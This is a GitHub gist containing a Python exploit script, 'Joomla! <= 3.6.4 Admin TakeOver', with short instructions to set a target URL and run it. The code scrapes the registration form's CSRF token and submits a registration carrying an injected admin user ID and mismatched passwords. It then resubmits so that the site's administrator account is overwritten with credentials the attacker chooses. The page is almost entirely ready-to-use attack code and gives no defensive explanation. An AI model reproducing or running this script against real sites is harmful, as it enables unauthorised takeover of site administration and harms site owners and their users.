Skip to content

Instantly share code, notes, and snippets.

@mikimaine
Created January 28, 2017 13:04
Show Gist options
  • Save mikimaine/1f4d02b36835edbea8b7b731386e0f6f to your computer and use it in GitHub Desktop.
Save mikimaine/1f4d02b36835edbea8b7b731386e0f6f to your computer and use it in GitHub Desktop.
Joomla! <= 3.6.4 Admin TakeOver , source 'cx' .
#!/usr/bin/python3
# Joomla! <= 3.6.4 Admin TakeOver
#Make sure you have python3 on your machine
#To run the script: chnage the target url variable
#Then open terminal
#in bash run : python3 joomla_take_over.py
#thats it
import bs4
import requests
import random
#Id
ADMIN_ID = 230
url = 'joomla site url' #put the target website url
form_url = url + 'index.php/component/users/?view=registration'
action_url = url + 'index.php/component/users/?task=registration.register'
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@maine.com'
password = 'MaineIsToo123'
user_data = {
'name': username,
'username': username,
'password1': password,
'password2': password + 'XXXinvalid',
'email1': email,
'email2': email,
'id': '%d' % ADMIN_ID
}
session = requests.Session()
# Grab original data from the form, including the CSRF token
response = session.get(form_url)
soup = bs4.BeautifulSoup(response.text, 'lxml')
form = soup.find('form', id='member-registration')
data = {e['name']: e['value'] for e in form.find_all('input')}
# Build our modified data array
user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
data.update(user_data)
# First request will get denied because the two passwords are mismatched
response = session.post(action_url, data=data)
# The second will work
data['jform[password2]'] = data['jform[password1]']
del data['jform[id]']
response = session.post(action_url, data=data)
print("Account modified to user: %s [%s]" % (username, email))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment